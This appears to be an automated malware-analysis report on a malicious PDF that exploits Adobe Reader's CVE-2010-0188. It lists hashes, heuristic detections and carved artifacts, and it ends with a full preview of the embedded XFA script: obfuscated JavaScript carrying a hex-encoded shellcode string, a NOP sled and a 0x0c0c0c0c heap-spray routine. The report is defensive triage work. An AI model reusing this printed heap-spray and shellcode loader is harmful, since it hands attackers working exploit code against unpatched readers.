Malicious PDF — malware analysis report

Static analysis result for SHA-256 a967a1523f859cfb…

MALICIOUS

PDF

235.2 KB Created: 2010-02-23 12:29:53 -08:00 First seen: 2013-08-16
MD5: 2b4b5e0ce5a19d81ea918f50f56ff8d0 SHA-1: f75ee1946cbf19efa7635eed7003e518a45549cc SHA-256: a967a1523f859cfbd69de0d5f9f70228e100ec9d7bf07066cbfb206b8e4d4b23
488 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File: User Execution: Malicious Attachment T1059.001 Command and Scripting Interpreter: PowerShell

The sample is a PDF document that leverages XFA forms and JavaScript to trigger a heap spray vulnerability, specifically identified as CVE-2010-0188. This exploit is designed to execute arbitrary code. The PDF also contains embedded scripts and is flagged as a potential lure, suggesting it's designed to trick the user into interacting with the malicious content. The presence of multiple PDF-specific exploit heuristics strongly indicates this attack vector.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9886

Heuristics 17

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink getAnnots, associated with CVE-2009-1492. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Flate image XObject contains x86 NOP sled high CVE related PDF_FLATE_IMAGE_NOP_SLED
    PDF embeds a FlateDecode image XObject whose decoded bytes are dominated by x86 NOP instructions, alongside form or embedded-file delivery structures. This is exploit payload staging evidence and is related to Adobe Reader parser-exploit families, but it is not a unique CVE fingerprint by itself.
  • ClamAV: Pdf.Dropper.Agent-1861614 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Dropper.Agent-1861614
  • XFA JavaScript heap-spray exploit code critical PDF_XFA_HEAP_SPRAY
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • PDF embedded file could not be fully decoded medium PDF_EMBEDDED_FILE_UNDECODED
    A declared PDF /EmbeddedFile stream uses filters that the scanner could not decode. The raw stream was carved for artifact triage because malformed or unsupported attachment filters can hide payload content from normal extraction.
  • Image-only document with action trigger (screenshot lure) medium PDF_IMAGE_LURE
    PDF has 2 image(s), only 1 text block(s), carries a click-outward action, and is only 235 KB — typical shape of a phishing lure where a full-page screenshot hides a clickable button that launches or submits to an attacker URL.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded script payload in PDF stream info PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://www.xfa.org/schema/xci/1.0/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.4/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/Referenced by PDF JavaScript
    • http://cgi.adobe.com/special/acrobat/updateReferenced by PDF JavaScript
    • http://www.w3.org/1999/xhtmlReferenced by PDF JavaScript
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-locale-set/2.7/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-locale-set/2.1/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-form/2.8/Referenced by PDF JavaScript
🗂 Part of campaign: shared payload 964b35fd2c 29 samples

Extracted artifacts 13

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0002.bin pdf-embedded-file PDF EmbeddedFile object 2 at offset 0x19FA 85 bytes
SHA-256: c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb
embedded_file_obj0003.bin pdf-embedded-file PDF EmbeddedFile object 3 at offset 0x1AAC 1466 bytes
SHA-256: 0cae1494b9c99505bf126e683a1a8be36bc8d5e793ab829e266d6e2fd62ccac3
embedded_file_obj0004.bin pdf-embedded-file PDF EmbeddedFile object 4 at offset 0x1D6B 9139 bytes
SHA-256: bba8bf418f33399b86bade7f543ef5fd12b58f2d14e855376884ed7fd0db0bd7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
embedded_file_obj0005.bin pdf-embedded-file PDF EmbeddedFile object 5 at offset 0x290F 11465 bytes
SHA-256: 5ec8f1fc794dbe13de1158baff72cda0c7fcbc4b3734b087d4e21aedfa6235ba
regedit.exe pdf-embedded-file-undecodable PDF EmbeddedFile object 86 at offset 0x13B95; filter decode failed 132942 bytes
SHA-256: 81a2047890fdcaf2ae5b68533587d5b2b4fd3c6cad762bab9adecece99bce8b7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
xfa_image_rawvalue_000.tif pdf-xfa-image-tiff XFA image/rawValue TIFF payload near offset 0x36D6C 8538 bytes
SHA-256: 671a354149e0ee431b9ab639739547a82c1110f751869622d000c6e04bf7d45f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled, heap spray 0x0C
xfa_image_rawvalue_001.tif pdf-xfa-image-tiff XFA image/rawValue TIFF payload near offset 0x29A1 8379 bytes
SHA-256: 089f97fbfca09cd255eb4005a30c5f9f2c6d2d3acb4fccb192622ff8e9f738bc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled
stream_002_off000003e1.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3E1 1532 bytes
SHA-256: f574e4d51594d1a8fd22e125b109b827c437aa898edc78babb62dbb93f8744f8
stream_003_off000005cc.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x5CC 870 bytes
SHA-256: 4a1aca004cf20431c9a66dce85404a6411a54d881a6c257882260ffc972a13eb
stream_005_off0000112a.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x112A 3024 bytes
SHA-256: 8358d835225babc82acbcbbf2cb07512b8fb3772c5b46ff5956d2c6d02da8c39
stream_013_off00002ad7.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x2AD7 2928 bytes
SHA-256: 226eeacc5eecef2a05ca480f144ff6936594e20b5c7672e8f29f25c8bea65a56
stream_016_off00003110.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3110 291 bytes
SHA-256: e65f1e07bc965092b3153e64a1e8777a909cc47a98c0e2a10d38c47def2e6652
embedded_pdf_script_00034a58.bin pdf-embedded-script PDF raw stream script payload at offset 0x34A58 9163 bytes
SHA-256: 964b35fd2cf89dd55c1ec763fabaa19e720fcce510e60402ad1e45eecd2754e0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
<template xmlns="http://www.xfa.org/schema/xfa-template/2.4/" baseProfile="interactiveForms"><subform layout="tb" locale="en_US" name="topmostSubform"><pageSet><pageArea id="PageArea1" name="PageArea1"><contentArea h="792pt" name="ContentArea1" w="612pt" x="0pt" y="0pt"></contentArea><medium long="792pt" short="612pt" stock="custom"></medium></pageArea></pageSet><variables><script contentType="application/x-javascript" name="ADBE::FileAttachmentsCompatibility">/*var v = app.viewerVersion;
if (v &lt; 7)
{
	var n = 0;
	if (this.dataObjects != null)
		n = this.dataObjects.length;
	if (v &gt;= 5 &amp;&amp; v &lt; 6 &amp;&amp; n &gt; 0 &amp;&amp; (app.viewerVariation == "Full" || app.viewerVariation == "Fill-In"))
	{
		if (this.external)
			app.alert("This document has file attachments. To view the attachments, click the Save button to save a copy of the document, open the copy in Acrobat, and use the File &gt; Document Properties &gt; Embedded Data Objects menu.", 3, 0);
		else
			app.alert("This document has file attachments. Use the File &gt; Document Properties &gt; Embedded Data Objects menu to view the attachments.", 3, 0);
	}
	else if (v &gt;= 6 &amp;&amp; v &lt; 7)
	{
		if (n == 0)
		{
			var np = this.numPages;
			syncAnnotScan();
			for (var p = 0; p &lt; np &amp;&amp; n == 0; ++p)
			{
				var annots = this.getAnnots(p);
				if (annots != null)
				{
					for (var i = 0; i &lt; annots.length; ++i)
					{
						if (annots[i].type == "FileAttachment")
						{
							n = 1;
							break;
						}
					}
				}
			}
		}
		if (n &gt; 0)
		{
			if (this.external)
				app.alert("This document has file attachments. To view the attachments, click the black triangle at the top of the document window's vertical scrollbar and choose File Attachments.", 3, 0);
			else
				app.alert("This document has file attachments. Use the Document &gt; File Attachments menu to view the attachments.", 3, 0);
		}
	}
}
*/</script><script contentType="application/x-javascript" name="d">/*var  ____ = unescape;&#xD;
var  _c1 = 				"\x6c\x65\x6e\x67\x74\x68";&#xD;
function _____(__){var _='';for(var ___=0;___&lt;__[_c1];___+=4) _+='%'+'u'+__.substr(___,4);return _;}&#xD;
function 	rep(_	,	__)	{	var ___	=	""	;	while (	--_&gt;=	0) ___	+=	 __	;	return	 ___;}&#xD;
&#xD;
var		 sc=		____		(	_____("9090909090909090EB905E1a5B56068a303c1674E0c04604268aE480020f88c44303EB46E8e9FFe1FFff7466515a70437050707050506B6850644C504B6850776C714D5a6B5850474850794e4453625050705050787551684C4e50506270505050504B686C4f4978574778504978774450616F6f5757785048666C4e775943506C70584e644c615070507070494847544C614F4f574778704866764f5262594b4C67584e446b7150705070506948777470524F6f777768707876457a776150506C67684e544a7170705070707958776474724F4f4767587058664B6f67796D4f6F50584e54496150705070705958476458524F4f476768504856665165767A4f7041786e6458415050707070497867644C626F6f6767785058664F4169675A70684e686e74675150705050504948577450634F6f7767685078565572706b4F4f726c484e64465170505050707968575474636F4f6777587048566C5a48507A4d5667784e74554170707050504948774478536F4f47477850486648494E6f4A584E70586e4474617050505050597857444C734F4f475778504846546749686C6e6959584e64634170505050707958475470544F4f7777785048466E47784d524e5377786e44524170707070705958576444646F6f5757685078564D5a6B494D774F4d784e74417170705070507978674468646F4f577750616F6f677564736363766f46646D7867645046704576454F6f575548547358584f4F6f4447726f4D73707050417070705046674B4e7978477474504978574750466F6f575744707A4670546F4f67654C51794857446C455A7650706A4650704A5670706F6f574770666F4f777548734348584f6F4f44476B546A4670706D786F45505753754F4f475764704F6f57776C656F4f774750564F6f47454C624B684F7450677378696e70414B4857444C4550744148487346644E627A55487675674950514858476470635276507148695154775450526e6C4e6B6e4A417378506c48505948774464517064414848536A74556753566B6455574970717878476470624141505348696144476E50624e4C4e4F6f57776C454F4f774570526F70554842676F6f4F4f6F4f6378706c78507978674458714A767070786650687050707050705A6662705A7670704A465050785670705050707070644F4f477750716F6f47657462497877747476776c67544C466D547A65704950506A5650704D786F55704753557A6664504D486F654C7663756F6f576744666F4f676570634B68777458516B42575454617368586e58506B784F55747170435370637478445368786f50506557474f5A4670504D584F65506763754B584F6548416B524F65444163584B4e687063754F6f475764414F6f576774564F4f574570736F4f474754466F4f476568625A5670506F4f576750714F6f67556C637A5650504F4f4745445475756B684C6e47454B784D7768704B786D754C7066454B6853576C536B4854574E7178574350736f66754B58467750427350734f6343696c697441746D7a4370636c46757373564f4F706E4b70715A73626f74675850414c4E4c6D504350524f50446B4e514f4B534E6f4E455567454e4A756B584B6e6B586A75644273704D6d76564B486C706B744B584A456C5163704D4d6B7864704B586350754c6E454F556D65626c78507050486e476c6D6f4F4f6F6f43464A736C5551764E5255565857757670503030"));&#xD;
&#xD;
function uuu(){&#xD;
_ = rep(128, ____	(_____		("42424242424242424242"))) + sc;&#xD;
_0 = 			____		(	_____("0c0c0c0c"));&#xD;
_1 = 20	+_[_c1];&#xD;
while (_0[	_c1]&lt;_1) _0+=_0;&#xD;
_2	 = 	_0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 	_1);&#xD;
_3 	=	 _0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, _0[_c1	]-_1);&#xD;
while(_3[_c1]	 +  _1&lt;0x80000) _3 		= _3+	_3+_2;&#xD;
_4= new Array();&#xD;
for(i=0;i&lt;=192;i=i+1)	_4[i]				=_3		+_;&#xD;
}&#xD;
uuu();*/</script><?templateDesigner expand 1?></variables><subform h="792pt" name="Page1" w="612pt" x="0pt" y="0pt"><break before="pageArea" beforeTarget="#PageArea1"></break><bind match="none"></bind><field h="9.525mm" name="ImageField1" w="150.767mm" x="37.972mm" y="29.655mm"><ui><imageEdit></imageEdit></ui><event activity="ready" name="event__form_ready" ref="$form"><script contentType="application/x-javascript">var  ____ = unescape;
var  _c1 = 				"\x6c\x65\x6e\x67\x74\x68";
function _____(__){var _='';for(var ___=0;___&lt;__[_c1];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
function 	rep(_	,	__)	{	var ___	=	""	;	while (	--_&gt;=	0) ___	+=	 __	;	return	 ___;}

var		 sc=		____		(	_____("9090909090909090EB905E1a5B56068a303c1674E0c04604268aE480020f88c44303EB46E8e9FFe1FFff7466515a70437050707050506B6850644C504B6850776C714D5a6B5850474850794e4453625050705050787551684C4e50506270505050504B686C4f4978574778504978774450616F6f5757785048666C4e775943506C70584e644c615070507070494847544C614F4f574778704866764f5262594b4C67584e446b7150705070506948777470524F6f777768707876457a776150506C67684e544a7170705070707958776474724F4f4767587058664B6f67796D4f6F50584e54496150705070705958476458524F4f476768504856665165767A4f7041786e6458415050707070497867644C626F6f6767785058664F4169675A70684e686e74675150705050504948577450634F6f7767685078565572706b4F4f726c484e64465170505050707968575474636F4f6777587048566C5a48507A4d5667784e74554170707050504948774478536F4f47477850486648494E6f4A584E70586e4474617050505050597857444C734F4f475778504846546749686C6e6959584e64634170505050707958475470544F4f7777785048466E47784d524e5377786e44524170707070705958576444646F6f5757685078564D5a6B494D774F4d784e74417170705070507978674468646F4f577750616F6f677564736363766f46646D7867645046704576454F6f575548547358584f4F6f4447726f4D73707050417070705046674B4e7978477474504978574750466F6f575744707A4670546F4f67654C51794857446C455A7650706A4650704A5670706F6f574770666F4f777548734348584f6F4f44476B546A4670706D786F45505753754F4f475764704F6f57776C656F4f774750564F6f47454C624B684F7450677378696e70414B4857444C4550744148487346644E627A55487675674950514858476470635276507148695154775450526e6C4e6B6e4A417378506c48505948774464517064414848536A74556753566B6455574970717878476470624141505348696144476E50624e4C4e4F6f57776C454F4f774570526F70554842676F6f4F4f6F4f6378706c78507978674458714A767070786650687050707050705A6662705A7670704A465050785670705050707070644F4f477750716F6f47657462497877747476776c67544C466D547A65704950506A5650704D786F55704753557A6664504D486F654C7663756F6f576744666F4f676570634B68777458516B42575454617368586e58506B784F55747170435370637478445368786f50506557474f5A4670504D584F65506763754B584F6548416B524F65444163584B4e687063754F6f475764414F6f576774564F4f574570736F4f474754466F4f476568625A5670506F4f576750714F6f67556C637A5650504F4f4745445475756B684C6e47454B784D7768704B786D754C7066454B6853576C536B4854574E7178574350736f66754B58467750427350734f6343696c697441746D7a4370636c46757373564f4F706E4b70715A73626f74675850414c4E4c6D504350524f50446B4e514f4B534E6f4E455567454e4A756B584B6e6B586A75644273704D6d76564B486C706B744B584A456C5163704D4d6B7864704B586350754c6E454F556D65626c78507050486e476c6D6f4F4f6F6f43464A736C5551764E5255565857757670503030"));

function uuu(){
_ = rep(128, ____	(_____		("42424242424242424242"))) + sc;
_0 = 			____		(	_____("0c0c0c0c"));
_1 = 20	+_[_c1];
while (_0[	_c1]&lt;_1) _0+=_0;
_2	 = 	_0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 	_1);
_3 	=	 _0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, _0[_c1	]-_1);
while(_3[_c1]	 +  _1&lt;0x80000) _3 		= _3+	_3+_2;
_4= new Array();
for(i=0;i&lt;=192;i=i+1)	_4[i]				=_3		+_;
}
uuu();
ImageField1.value.image.href = "exploit.tif";

</script></event></field><?templateDesigner expand 1?></subform><?templateDesigner expand 1?></subform><?templateDesigner FormTargetVersion 24?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 95?></template>